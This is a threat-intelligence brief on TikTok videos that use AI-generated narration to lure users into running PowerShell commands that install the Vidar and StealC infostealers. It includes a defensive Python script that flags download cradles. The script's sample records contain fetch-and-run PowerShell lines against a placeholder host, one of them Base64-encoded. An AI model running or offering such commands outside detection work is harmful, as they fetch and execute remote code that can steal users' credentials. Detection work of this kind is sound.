TikTok Videos Lead to Infostealing Malware

TikTok videos promising pirated apps are luring users into running commands that install credential-stealing malware, with AI-generated content driving the lure.

In a new twist on an old tactic, threat actors are using TikTok videos that promise access to pirated apps but instead lead to information-stealing malware. The videos, produced with AI tools, talk victims through running PowerShell commands in the belief that they are installing free, legitimate applications; the commands instead fetch and run the malware. The infostealers delivered, Vidar and StealC, capture cleartext credentials, payment card data, and other user information. The use of information stealers has steadily increased in 2025, and the use of alternative stealers, including those observed in this campaign, will likely increase following Microsoft’s disruption of the prominent Lumma Stealer operation.
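Because the lure only pays off when the victim pastes a fetch-and-run command into PowerShell, script block logging (PowerShell Operational log, Event ID 4104) is where the behaviour surfaces regardless of which stealer is on the other end. The following is an added example, not code from the article or from Arete: a small Python triage over constructed script-block text that flags download cradles, including ones hidden behind -EncodedCommand. The sample records, the example.invalid hostnames and the indicator patterns are assumptions for illustration and are not the campaign's actual commands.

```python
"""
Heuristic triage of PowerShell script-block text for download-and-execute
("download cradle") patterns. Intended input: the ScriptBlockText field of
Event ID 4104 exported as plain text. All records below are constructed for
this example; they are not the campaign's commands.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

# Indicator regexes. PowerShell is case-insensitive, so every pattern is too.
PATTERNS = {
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web-fetch": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget)\b"
        r"|downloadstring|downloadfile|net\.webclient", re.I),
    "bypass-policy": re.compile(
        r"-(?:ep|executionpolicy)\s+bypass|-w(?:indowstyle)?\s+hidden", re.I),
    "url": re.compile(r"https?://[^\s'\"()]+", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob (UTF-16LE script).
ENCODED_RX = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    record_id: str
    severity: str          # "high" or "medium"
    reasons: list[str]     # matched indicators; "decoded:" prefix = inside the encoded script
    decoded: str | None    # inner script recovered from -EncodedCommand, if any


def scan_text(text: str) -> set[str]:
    """Return the names of every indicator pattern that matches the text."""
    return {name for name, rx in PATTERNS.items() if rx.search(text)}


def decode_encoded_command(text: str) -> str | None:
    """Recover the script behind -EncodedCommand; None if absent or malformed."""
    m = ENCODED_RX.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def is_cradle(hits: set[str]) -> bool:
    """Fetch-then-run, or fetch with policy bypass / hidden window, is the cradle shape."""
    return "web-fetch" in hits and ("invoke-expression" in hits or "bypass-policy" in hits)


def triage(records: list[tuple[str, str]]) -> list[Finding]:
    """Score each (record_id, script_text) pair and return only the suspicious ones."""
    findings: list[Finding] = []
    for rid, text in records:
        outer = scan_text(text)
        decoded = decode_encoded_command(text)
        inner = scan_text(decoded) if decoded else set()
        reasons = sorted(outer) + sorted(f"decoded:{h}" for h in inner)
        if is_cradle(outer) or is_cradle(inner):
            findings.append(Finding(rid, "high", reasons, decoded))
        elif ENCODED_RX.search(text):
            # Encoded command with no recognisable cradle (or undecodable):
            # worth an analyst's look, not an alert on its own.
            findings.append(Finding(rid, "medium", reasons, decoded))
    return findings


# Constructed sample script blocks (hypothetical; example.invalid is a reserved TLD).
INNER_SCRIPT = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/p.ps1")'
INNER_B64 = base64.b64encode(INNER_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_RECORDS = [
    ("r1", r"Get-ChildItem C:\Users -Recurse | Where-Object Length -gt 1MB"),
    ("r2", "Invoke-WebRequest https://example.invalid/report.csv -OutFile report.csv"),
    ("r3", "iex (iwr -UseBasicParsing 'http://example.invalid/activate.txt').Content"),
    ("r4", f"powershell -ep bypass -w hidden -enc {INNER_B64}"),
    ("r5", "powershell -EncodedCommand AAAAAAAAAAAAAAAAA"),   # malformed Base64
]

if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f.record_id, f.severity, ", ".join(f.reasons))
        if f.decoded:
            print("   decoded:", f.decoded)
```

Plain downloads such as r2 are deliberately not flagged: the signal is the combination of fetching remote content and executing it (or a hidden, policy-bypassing window), which is what a pasted install command looks like and what routine administration rarely does. In production the patterns would be paired with the user context from the same event (an interactive session rather than a management agent) to keep the false-positive rate down.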
 

What’s Notable and Unique

  • Social engineering tactics driven through social media are an attractive option for cybercriminals due to the sheer number of users and the ability to proliferate malicious content across that user base with relative ease.
  • At least six TikTok accounts were identified as part of this campaign. These faceless accounts used AI-generated content to verbally instruct victims to run the malicious scripts on their devices.

 

Analyst Comments

Enticing victims into downloading malicious software with the promise of free applications, software, or content is not a new concept, nor is the use of social media to propagate malware. However, the combination of a social media platform with a very large user base and AI-generated content is a powerful tool in the wrong hands. Coupled with the general increase in the use of information stealers to capture cleartext credentials, this is a concerning trend in cybercriminal operations. Arete will continue monitoring the use of social media to propagate malware and other cybercriminal activity.
 
